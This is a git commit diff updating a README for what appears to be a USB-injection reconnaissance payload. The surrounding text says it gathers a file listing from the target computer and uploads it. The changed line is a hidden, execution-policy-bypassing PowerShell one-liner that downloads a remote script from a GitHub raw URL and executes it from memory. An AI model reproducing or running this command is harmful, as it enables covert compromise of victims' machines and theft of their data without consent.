Update README.md
This commit is contained in:
parent
7ac6e3065f
commit
110cc164fc
1 changed files with 1 additions and 1 deletions
|
@ -40,7 +40,7 @@ Along with TREE list of all files in the target computer is gathered and uploade
|
||||||
* Plug in your device
|
* Plug in your device
|
||||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
||||||
```
|
```
|
||||||
powershell -w h -NoP -NonI -Ep Bypass iwr https://raw.githubusercontent.com/I-Am-Jakoby/1/main/ADV-Recon.ps1 | iex
|
powershell -w h -NoP -NonI -Ep Bypass $db='';iwr https://raw.githubusercontent.com/I-Am-Jakoby/1/main/ADV-Recon.ps1 | iex
|
||||||
```
|
```
|
||||||
|
|
||||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||||
|
|
Loading…
Reference in a new issue